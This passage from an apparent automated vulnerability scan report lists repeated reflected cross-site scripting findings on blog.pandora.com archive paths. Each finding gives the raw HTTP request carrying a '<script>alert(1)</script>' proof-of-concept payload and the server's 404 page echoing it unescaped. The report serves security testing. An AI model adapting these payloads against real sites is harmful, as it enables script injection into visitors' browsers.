Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora17f6e<script>alert(1)</script>7ad2feaf14c/archives/2007/11/ was not found on this server.</p>
...[SNIP]...

3.130. http://blog.pandora.com/pandora/archives/2007/11/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/11/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a9e9a<script>alert(1)</script>743af107344 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesa9e9a<script>alert(1)</script>743af107344/2007/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesa9e9a<script>alert(1)</script>743af107344/2007/11/ was not found on this server.</p>
...[SNIP]...

3.131. http://blog.pandora.com/pandora/archives/2007/11/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/11/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 76aa1<script>alert(1)</script>70d85d884f6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200776aa1<script>alert(1)</script>70d85d884f6/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200776aa1<script>alert(1)</script>70d85d884f6/11/ was not found on this server.</p>
...[SNIP]...

3.132. http://blog.pandora.com/pandora/archives/2007/11/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/11/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload be509<script>alert(1)</script>31065c5cb7d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/11be509<script>alert(1)</script>31065c5cb7d/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:02 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/11be509<script>alert(1)</script>31065c5cb7d/ was not found on this server.</p>
...[SNIP]...

3.133. http://blog.pandora.com/pandora/archives/2007/12/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/12/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 22432<script>alert(1)</script>251e4966396 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora22432<script>alert(1)</script>251e4966396/archives/2007/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:49 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora22432<script>alert(1)</script>251e4966396/archives/2007/12/ was not found on this server.</p>
...[SNIP]...

3.134. http://blog.pandora.com/pandora/archives/2007/12/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/12/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6520c<script>alert(1)</script>295fc6b8631 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives6520c<script>alert(1)</script>295fc6b8631/2007/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives6520c<script>alert(1)</script>295fc6b8631/2007/12/ was not found on this server.</p>
...[SNIP]...

3.135. http://blog.pandora.com/pandora/archives/2007/12/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/12/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a6d8f<script>alert(1)</script>3888aff47e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007a6d8f<script>alert(1)</script>3888aff47e/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007a6d8f<script>alert(1)</script>3888aff47e/12/ was not found on this server.</p>
...[SNIP]...

3.136. http://blog.pandora.com/pandora/archives/2007/12/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/12/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3bf47<script>alert(1)</script>c247d05fe1f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/123bf47<script>alert(1)</script>c247d05fe1f/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/123bf47<script>alert(1)</script>c247d05fe1f/ was not found on this server.</p>
...[SNIP]...

3.137. http://blog.pandora.com/pandora/archives/2008/01/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/01/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9839c<script>alert(1)</script>cc1f4677e63 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora9839c<script>alert(1)</script>cc1f4677e63/archives/2008/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:50 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora9839c<script>alert(1)</script>cc1f4677e63/archives/2008/01/ was not found on this server.</p>
...[SNIP]...

3.138. http://blog.pandora.com/pandora/archives/2008/01/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/01/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c4d9b<script>alert(1)</script>1d7f2c0691b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesc4d9b<script>alert(1)</script>1d7f2c0691b/2008/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesc4d9b<script>alert(1)</script>1d7f2c0691b/2008/01/ was not found on this server.</p>
...[SNIP]...

3.139. http://blog.pandora.com/pandora/archives/2008/01/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/01/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 59e99<script>alert(1)</script>825e8cfc0de was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200859e99<script>alert(1)</script>825e8cfc0de/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200859e99<script>alert(1)</script>825e8cfc0de/01/ was not found on this server.</p>
...[SNIP]...

3.140. http://blog.pandora.com/pandora/archives/2008/01/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/01/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fe2be<script>alert(1)</script>1f3f48cf5b1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/01fe2be<script>alert(1)</script>1f3f48cf5b1/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/01fe2be<script>alert(1)</script>1f3f48cf5b1/ was not found on this server.</p>
...[SNIP]...

3.141. http://blog.pandora.com/pandora/archives/2008/02/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/02/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ac1f<script>alert(1)</script>ef5a796adc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora2ac1f<script>alert(1)</script>ef5a796adc4/archives/2008/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:48 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2ac1f<script>alert(1)</script>ef5a796adc4/archives/2008/02/ was not found on this server.</p>
...[SNIP]...

3.142. http://blog.pandora.com/pandora/archives/2008/02/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/02/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 34032<script>alert(1)</script>06892156e4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives34032<script>alert(1)</script>06892156e4e/2008/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives34032<script>alert(1)</script>06892156e4e/2008/02/ was not found on this server.</p>
...[SNIP]...

3.143. http://blog.pandora.com/pandora/archives/2008/02/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/02/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6411d<script>alert(1)</script>c8b26e3f983 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20086411d<script>alert(1)</script>c8b26e3f983/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:53 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20086411d<script>alert(1)</script>c8b26e3f983/02/ was not found on this server.</p>
...[SNIP]...

3.144. http://blog.pandora.com/pandora/archives/2008/02/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/02/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e1573<script>alert(1)</script>3b6a99d2827 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/02e1573<script>alert(1)</script>3b6a99d2827/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/02e1573<script>alert(1)</script>3b6a99d2827/ was not found on this server.</p>
...[SNIP]...

3.145. http://blog.pandora.com/pandora/archives/2008/03/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/03/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 172d5<script>alert(1)</script>d6b14e8dbb2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora172d5<script>alert(1)</script>d6b14e8dbb2/archives/2008/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:47 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora172d5<script>alert(1)</script>d6b14e8dbb2/archives/2008/03/ was not found on this server.</p>
...[SNIP]...

3.146. http://blog.pandora.com/pandora/archives/2008/03/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/03/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5ee2e<script>alert(1)</script>224981c07fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives5ee2e<script>alert(1)</script>224981c07fd/2008/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
